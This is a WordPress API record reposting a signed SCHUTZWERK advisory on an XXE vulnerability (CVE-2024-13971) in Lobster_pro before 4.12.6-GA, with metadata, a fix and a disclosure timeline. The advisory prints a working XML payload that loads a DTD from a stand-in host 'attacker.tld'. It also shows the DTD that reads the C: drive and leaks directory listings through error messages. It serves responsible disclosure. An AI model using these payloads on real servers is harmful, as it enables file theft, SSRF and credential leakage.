{"id":55366,"date":"2026-05-18T15:32:12","date_gmt":"2026-05-18T15:32:12","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=55366"},"modified":"2026-05-18T15:32:12","modified_gmt":"2026-05-18T15:32:12","slug":"lobsterpro-arbitrary-file-read-server-side-request-forgery","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=55366","title":{"rendered":"\ud83d\udcc4 Lobster_pro Arbitrary File Read \/ Server-Side Request Forgery_PACKETSTORM:221284"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-18T19:59:54&#8243;,&#8221;description&#8221;:&#8221;Unauthenticated attackers can exploit a weakness in the XML parser functionality of Lobsterpro prior to version 4.12.6-GA. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-18T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-18T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Lobster_pro Arbitrary File Read \/ Server-Side Request Forgery&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:221284&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-13971&#8243;],&#8221;sourceData&#8221;:&#8221;&#8212;&#8211;BEGIN PGP SIGNED MESSAGE&#8212;&#8211;\\n    Hash: SHA512\\n    \\n    Arbitrary File Read and Server Side Request Forgery via XML External \\n    Entities in\\n    Lobster_pro\\n    ============================================================================================\\n    \\n    Unauthenticated attackers can exploit a weakness in the XML parser \\n    functionality of\\n    Lobster_pro prior to version 4.12.6-GA. This allows them to obtain read \\n    access to files on\\n    the application server and adjacent network shares, and perform HTTP GET \\n    requests to\\n    arbitrary services.\\n    \\n    Metadata\\n    ========\\n    \\n    &#8211; &#8211; Affected product: Lobster_pro\\n    &#8211; &#8211; Affected version: versions prior to 4.12.6-GA\\n    &#8211; &#8211; Vendor: Lobster DATA GmbH\\n    &#8211; &#8211; Problem type(s): CWE-611 Improper Restriction of XML External Entity \\n    Reference\\n    &#8211; &#8211; CVE ID: CVE-2024-13971\\n    &#8211; &#8211; CVE URL: https:\/\/www.cve.org\/CVERecord?id=CVE-2024-13971\\n    &#8211; &#8211; CVSS 4.0 score: 7.7\\n    &#8211; &#8211; Advisory URL: https:\/\/www.schutzwerk.com\/en\/blog\/schutzwerk-sa-2024-005\/\\n    \\n    Details\\n    =======\\n    \\n    During a recent red team engagement, the no-code platform Lobster_pro \\n    was identified as\\n    part of the customer&#8217;s internet-facing assets.\\n    \\n    The endpoint https:\/\/\\u003clobster-pro instance\\u003e:443\/system\/web was found to \\n    process XML via\\n    HTTP POST requests. Sending the following payload and observing the \\n    attacker-controlled\\n    web server confirms that XML External Entities (XXE) are followed and \\n    loaded by the\\n    application:\\n    \\n    \\u003c?xml version=\\&#8221;1.0\\&#8221; encoding=\\&#8221;UTF-8\\&#8221;?\\u003e\\n    \\u003c!DOCTYPE lbsterq [\\n             \\u003c!ENTITY % lobster SYSTEM \\&#8221;http:\/\/attacker.tld\/map.dtd\\&#8221;\\u003e\\n    %lobster;\\n    ]\\u003e\\n    \\u003cproperties\\u003elobster\\u003c\/properties\\u003e\\n    \\n    Serving the following file map.dtd, it is possible to retrieve file \\n    contents, directory\\n    listings or HTTP responses via the error message returned by the endpoint:\\n    \\n    \\u003c!ENTITY % cfga SYSTEM \\&#8221;file:\/\/\/c:\\&#8221;\\u003e\\n    \\u003c!ENTITY % eea \\&#8221;\\u003c!ENTITY \\u0026#x25; lobsterdata SYSTEM &#8216;#%cfga;&#8217;\\u003e\\&#8221;\\u003e\\n    %eea;\\n    %lobsterdata;\\n    \\n    The HTTP response contains an error message, embedding the file content \\n    or directory\\n    listing:\\n    \\n    \\u003c?xml version=\\&#8221;1.0\\&#8221; encoding=\\&#8221;UTF-8\\&#8221;?\\u003e\\n    \\u003ccore:ErrorResponse xmlns:core=\\&#8221;CORESYSTEM\\&#8221;\\u003e\\n       \\u003cerrorInfo\\u003e\\n          \\u003cerrorCode\\u003e500\\u003c\/errorCode\\u003e\\n          \\u003chttpResponseStatus\\u003e200\\u003c\/httpResponseStatus\\u003e\\n          \\u003clocale\\u003een\\u003c\/locale\\u003e\\n          \\u003cerrorText\\u003ejavax.xml.bind.UnmarshalException\\n     &#8211; with linked exception:\\n    [Exception [EclipseLink-25004] (Eclipse Persistence Services &#8211; \\n    2.7.8.qualifier): \\n    org.eclipse.persistence.exceptions.XMLMarshalException\\u0026#xd;\\n    Exception Description: An error occurred unmarshalling the document\\u0026#xd;\\n    Internal Exception: javax.xml.stream.XMLStreamException: ParseError at \\n    [row,col]:[4,10]\\n    Message: no protocol: #$Recycle.Bin\\n    Config.Msi\\n    [&#8230;]\\n    pagefile.sys\\n    PerfLogs\\n    ProgramData\\n    Program Files\\n    Program Files (x86)\\n    Programme\\n    [&#8230;]\\n    temp\\n    Users\\n    Windows\\n    ]\\u003c\/errorText\\u003e\\n          \\u003cerrorType\\u003ejava.io.IOException\\u003c\/errorType\\u003e\\n          \\u003cerrorLevel\\u003e1\\u003c\/errorLevel\\u003e\\n       \\u003c\/errorInfo\\u003e\\n    \\u003c\/core:ErrorResponse\\u003e\\n    \\n    Due to the way content is included, some symbols (e.g., the percent sign \\n    %) lead to\\n    recursive entity declarations, thus preventing data exfiltration.\\n    \\n    Risk\\n    ====\\n    \\n    An attacker can use the vulnerability to gather information and, \\n    depending on the stored\\n    data, exfiltrate secrets from the file system and adjacent SMB shares. \\n    Furthermore, HTTP\\n    requests can be used for out-of-band exfiltration and server side \\n    request forgery (SSRF)\\n    attacks. Utilizing the SMB protocol could also enable leakage of the \\n    application user NTLM\\n    hash.\\n    \\n    Solution\/Mitigation\\n    ===================\\n    \\n    Update to Lobster_pro release 4.12.6-GA or higher.\\n    \\n    Timeline\\n    ========\\n    \\n    &#8211; &#8211; 2024-08-12 Initial contact with vendor\\n    &#8211; &#8211; 2024-08-14 Vulnerability reported to vendor\\n    &#8211; &#8211; 2024-08-14 CVE ID requested\\n    &#8211; &#8211; 2024-08-22 Initial feedback received from vendor: unable to reproduce\\n    &#8211; &#8211; 2024-08-28 Vulnerability demonstrated in vendor&#8217;s \\&#8221;Community server\\&#8221;\\n    &#8211; &#8211; 2024-09-19 Vulnerability reported fixed by vendor in Lobster_pro \\n    release 4.12.6-GA\\n    &#8211; &#8211; 2025-07-03 Reserved CVE ID CVE-2024-13971\\n    &#8211; &#8211; 2026-04-30 Advisory released\\n    \\n    Credits\\n    =======\\n    \\n    The vulnerability was discovered by Marcelo Reyes of SCHUTZWERK GmbH.\\n    &#8212;&#8211;BEGIN PGP SIGNATURE&#8212;&#8211;\\n    \\n    iQJOBAEBCgA4FiEEgLsg7Oj\/wY3LSF87GrXfkTIXLrsFAmnzRmsaHGFkdmlzb3Jp\\n    ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrsvxRAAkVaWMk\/lJwfZi0Y0OWpr\\n    5TQP\/YCieTkxpkdiY0PF8dGApB3cp8ysschRAUgWIbeR7f1cj\/4hbc3a1GxnZWV7\\n    2gk1fdQieSdkJs8uBsKz0CeEasMztCI6KcmxWL+CMFHJoH+Q5Gd7MdOh1Og\/zVgh\\n    \/UAAfzxihL0Gmx+gl6hpZVYSmqQctD4ogbmdQCU2mEuoHZRGLCzaiOtS8AZbOhvT\\n    3IvC3ws3cQIAwzD7YH+5V+97cXqbFVnRoNL4YgJ9\/pCHXinYZvL1JGL4Ob26\/GvD\\n    QfYqUOgpDsfr9GTZVSZT3S8pUVomMW9+FOjhpcOkRICkJ8cEdLhW5CIoaxweEcwE\\n    PQSSC5QS5DIfVKgGo4lc0Oe9k3pT\/dnH9iEfnV5hnq7+JgapQzqxNaf6BCZJX+ET\\n    voIVVjyOYyP2Qzs4LSaArWxlcb0XR\/DewW9qlvfnea4SfDkrG\/hhRK3qBNrC83IR\\n    IXmBTbp32Sfoh2X1W\/frL4BtvIXkDirgF+sttAjoQKN3wVttuKj1JaM\/BQ\/pDf\/N\\n    pPAwaYzuuuf2Wv3NiBKIgB5tHuHKAQoKQPev7Z6pvDq0sB5ps9SRknIOEmfh\/aoE\\n    7aNztVHs+\/6axCVKcuV7+qWv6HUwg4oDp78Lo9r8Oq\/9rdbZ3TKtf\/KWn4uT+sWw\\n    Zk6o928sfQFlkXtTXRiGSwE=\\n    =560Z\\n    &#8212;&#8211;END PGP SIGNATURE&#8212;&#8211;\\n    \\n    &#8212; \\n    SCHUTZWERK GmbH, Pfarrer-Wei\u00df-Weg 12, 89077 Ulm, Germany\\n    Zertifiziert \/ Certified ISO 27001, 9001 and TISAX\\n    \\n    Phone +49 731 977 191 0\\n    \\n    advisories@schutzwerk.com \/ www.schutzwerk.com\\n    \\n    Gesch\u00e4ftsf\u00fchrer \/ Managing Directors:\\n    Jakob Pietzka, Michael Sch\u00e4fer\\n    \\n    Amtsgericht Ulm \/  HRB 727391\\n    Datenschutz \/ Data Protection www.schutzwerk.com\/datenschutz&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/221284&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:7.7,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:L\/SC:H\/VI:N\/SI:N\/VA:N\/SA:N\/S:N\/AU:Y\/V:C&#8221;,&#8221;version&#8221;:&#8221;4.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/221284\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-18T19:59:54&#8243;,&#8221;description&#8221;:&#8221;Unauthenticated attackers can exploit a weakness in the XML parser functionality of Lobsterpro prior to version 4.12.6-GA. This allows them to obtain read access to&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,87,12,15,13,53,7,11,5],"class_list":["post-55366","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-77","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Lobster_pro Arbitrary File Read \/ Server-Side Request Forgery_PACKETSTORM:221284 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=55366\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Lobster_pro Arbitrary File Read \/ Server-Side Request Forgery_PACKETSTORM:221284 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-05-18T19:59:54&#8243;,&#8221;description&#8221;:&#8221;Unauthenticated attackers can exploit a weakness in the XML parser functionality of Lobsterpro prior to version 4.12.6-GA. This allows them to obtain read access to...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=55366\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-18T15:32:12+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=55366#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=55366\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Lobster_pro Arbitrary File Read \\\/ Server-Side Request Forgery_PACKETSTORM:221284\",\"datePublished\":\"2026-05-18T15:32:12+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=55366\"},\"wordCount\":1135,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.7\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=55366#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=55366\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=55366\",\"name\":\"\ud83d\udcc4 Lobster_pro Arbitrary File Read \\\/ Server-Side Request Forgery_PACKETSTORM:221284 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-18T15:32:12+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=55366#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=55366\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=55366#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Lobster_pro Arbitrary File Read \\\/ Server-Side Request Forgery_PACKETSTORM:221284\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Lobster_pro Arbitrary File Read \/ Server-Side Request Forgery_PACKETSTORM:221284 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=55366","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Lobster_pro Arbitrary File Read \/ Server-Side Request Forgery_PACKETSTORM:221284 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-05-18T19:59:54&#8243;,&#8221;description&#8221;:&#8221;Unauthenticated attackers can exploit a weakness in the XML parser functionality of Lobsterpro prior to version 4.12.6-GA. This allows them to obtain read access to...","og_url":"https:\/\/zero.redgem.net\/?p=55366","og_site_name":"zero redgem","article_published_time":"2026-05-18T15:32:12+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=55366#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=55366"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Lobster_pro Arbitrary File Read \/ Server-Side Request Forgery_PACKETSTORM:221284","datePublished":"2026-05-18T15:32:12+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=55366"},"wordCount":1135,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.7","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=55366#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=55366","url":"https:\/\/zero.redgem.net\/?p=55366","name":"\ud83d\udcc4 Lobster_pro Arbitrary File Read \/ Server-Side Request Forgery_PACKETSTORM:221284 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-18T15:32:12+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=55366#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=55366"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=55366#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Lobster_pro Arbitrary File Read \/ Server-Side Request Forgery_PACKETSTORM:221284"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/55366","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=55366"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/55366\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=55366"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=55366"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=55366"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}